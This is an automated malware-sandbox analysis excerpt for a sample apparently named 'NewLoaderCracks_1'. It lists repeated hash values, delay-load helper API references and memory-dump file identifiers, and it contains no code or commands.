                • Instruction ID: 6bb3696920fb57da0c529d7fc8899b9d118d100d3c4e3998fca1baa631bf77b3
                • Opcode Fuzzy Hash: 66d6dd6665a555eb061b0f75ac215d953d234b8730055093a3a970711132be7b
                • Instruction Fuzzy Hash: 5DB09296268007AD31185218292BA3A0E6CF4C0B22320841BBD09C024099404C095932
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DBD5
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: a9a835589c3c94d6b364318d8d1e69ad800a4dba978a5964879643b008a19b4c
                • Instruction ID: 73967feeaf2e69596e168abed324722c1768fdca5fa430eb3f50f89cfe9becd0
                • Opcode Fuzzy Hash: a9a835589c3c94d6b364318d8d1e69ad800a4dba978a5964879643b008a19b4c
                • Instruction Fuzzy Hash: DDB09297268007AD31185208282BA3A0E7CF4C0B22321841BBC09C1240D9404C0C5932
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DC36
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 171af6837c62a965a900a8f9e4278ca2025a8df8afb9535f7230916ee948519f
                • Instruction ID: 01cf665afa0b540b55047aabc3ac3275f27f636998a6ab6b44617321b83c52ff
                • Opcode Fuzzy Hash: 171af6837c62a965a900a8f9e4278ca2025a8df8afb9535f7230916ee948519f
                • Instruction Fuzzy Hash: 3EB012A726C102AD311C61487C27E3A0E7CF4C6B12330C91BBD0DD1140D5805C0D9931
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DC36
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 523f02015e56ea80b6943d921f1f1c96e5ea4e010725522de97353492553bec4
                • Instruction ID: 0fdfa42262c55e082c259642aae04a6f70b4491e841d42541bfa06cc0440f5e4
                • Opcode Fuzzy Hash: 523f02015e56ea80b6943d921f1f1c96e5ea4e010725522de97353492553bec4
                • Instruction Fuzzy Hash: 75B012A727C202AD311C61487C27E3A0E7CF4C1B12330891BBD0DD1140D5805C0C9931
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DC36
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: e648950a2dcd10af62bf769c80741f03d6f33a27edb8d9afcddddd8a19cf67e1
                • Instruction ID: caf3245ce27a392d20ff8a82be266d33aee8f9fc2db5676a24f590698b0db200
                • Opcode Fuzzy Hash: e648950a2dcd10af62bf769c80741f03d6f33a27edb8d9afcddddd8a19cf67e1
                • Instruction Fuzzy Hash: 85B012A726C202BD311C21447E27D3A0E3CF5C1B123308A1BBD09E0040D5805C4CA831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 421fc8fbe4b1391f59d10ad613456b64234614accaae00c3eae1424b71b26059
                • Instruction ID: d8d2c6cf0faa1ea522b393391d692f2caeb801ce08565ad52853b307d136fb84
                • Opcode Fuzzy Hash: 421fc8fbe4b1391f59d10ad613456b64234614accaae00c3eae1424b71b26059
                • Instruction Fuzzy Hash: 6AA0029756D503BD712862517D6AE360A2DE8C5B93334891BB84A940C19540584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f2a603894f17ad50ae9143cb579054380252e229f17ec967d852884f4ea81b3b
                • Instruction ID: d8d2c6cf0faa1ea522b393391d692f2caeb801ce08565ad52853b307d136fb84
                • Opcode Fuzzy Hash: f2a603894f17ad50ae9143cb579054380252e229f17ec967d852884f4ea81b3b
                • Instruction Fuzzy Hash: 6AA0029756D503BD712862517D6AE360A2DE8C5B93334891BB84A940C19540584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 6552b6bada066d8f06a42a0e16fad9b11943967c89d7d569f32fc8371ea01307
                • Instruction ID: d8d2c6cf0faa1ea522b393391d692f2caeb801ce08565ad52853b307d136fb84
                • Opcode Fuzzy Hash: 6552b6bada066d8f06a42a0e16fad9b11943967c89d7d569f32fc8371ea01307
                • Instruction Fuzzy Hash: 6AA0029756D503BD712862517D6AE360A2DE8C5B93334891BB84A940C19540584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9cda9d23fa24ce115fbfac4a14c1d751a79a984897ca6441702137df74d5a511
                • Instruction ID: d8d2c6cf0faa1ea522b393391d692f2caeb801ce08565ad52853b307d136fb84
                • Opcode Fuzzy Hash: 9cda9d23fa24ce115fbfac4a14c1d751a79a984897ca6441702137df74d5a511
                • Instruction Fuzzy Hash: 6AA0029756D503BD712862517D6AE360A2DE8C5B93334891BB84A940C19540584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5ec24583de71eb3692e5bed403013e822a8cd367ebf6a5960d7b621382b4bd95
                • Instruction ID: d8d2c6cf0faa1ea522b393391d692f2caeb801ce08565ad52853b307d136fb84
                • Opcode Fuzzy Hash: 5ec24583de71eb3692e5bed403013e822a8cd367ebf6a5960d7b621382b4bd95
                • Instruction Fuzzy Hash: 6AA0029756D503BD712862517D6AE360A2DE8C5B93334891BB84A940C19540584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 933459611269883cab782685f739c9af7d7f4c5776625762cfe8fb6bfdd54d53
                • Instruction ID: d8d2c6cf0faa1ea522b393391d692f2caeb801ce08565ad52853b307d136fb84
                • Opcode Fuzzy Hash: 933459611269883cab782685f739c9af7d7f4c5776625762cfe8fb6bfdd54d53
                • Instruction Fuzzy Hash: 6AA0029756D503BD712862517D6AE360A2DE8C5B93334891BB84A940C19540584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 86bb0128dd798d2d3066417bf0a6430f668f701d0da99724f849376e77a981ee
                • Instruction ID: d8d2c6cf0faa1ea522b393391d692f2caeb801ce08565ad52853b307d136fb84
                • Opcode Fuzzy Hash: 86bb0128dd798d2d3066417bf0a6430f668f701d0da99724f849376e77a981ee
                • Instruction Fuzzy Hash: 6AA0029756D503BD712862517D6AE360A2DE8C5B93334891BB84A940C19540584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f4e3677de371b2c83efc7c2229b48d9ece01352c404ff43fb52c947f11e60a65
                • Instruction ID: d8d2c6cf0faa1ea522b393391d692f2caeb801ce08565ad52853b307d136fb84
                • Opcode Fuzzy Hash: f4e3677de371b2c83efc7c2229b48d9ece01352c404ff43fb52c947f11e60a65
                • Instruction Fuzzy Hash: 6AA0029756D503BD712862517D6AE360A2DE8C5B93334891BB84A940C19540584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 57bb59eb17c8d2531dbde5cdcf0bd9e540ec46ded518ab773179b5218f89203c
                • Instruction ID: d8d2c6cf0faa1ea522b393391d692f2caeb801ce08565ad52853b307d136fb84
                • Opcode Fuzzy Hash: 57bb59eb17c8d2531dbde5cdcf0bd9e540ec46ded518ab773179b5218f89203c
                • Instruction Fuzzy Hash: 6AA0029756D503BD712862517D6AE360A2DE8C5B93334891BB84A940C19540584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 04a25759cd6cd13219c9215c637c20791977d99741d109d38a121b36b8edeee1
                • Instruction ID: d8d2c6cf0faa1ea522b393391d692f2caeb801ce08565ad52853b307d136fb84
                • Opcode Fuzzy Hash: 04a25759cd6cd13219c9215c637c20791977d99741d109d38a121b36b8edeee1
                • Instruction Fuzzy Hash: 6AA0029756D503BD712862517D6AE360A2DE8C5B93334891BB84A940C19540584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9c0940c7ab9f0be1505349d637b34dbbea0f036ea659f3400128b7b005bc9830
                • Instruction ID: d8d2c6cf0faa1ea522b393391d692f2caeb801ce08565ad52853b307d136fb84
                • Opcode Fuzzy Hash: 9c0940c7ab9f0be1505349d637b34dbbea0f036ea659f3400128b7b005bc9830
                • Instruction Fuzzy Hash: 6AA0029756D503BD712862517D6AE360A2DE8C5B93334891BB84A940C19540584D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DAB2
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b5f323252862f6179fd514a4c5fab59f4983ea174bc7aa729f78b24d9e905cc4
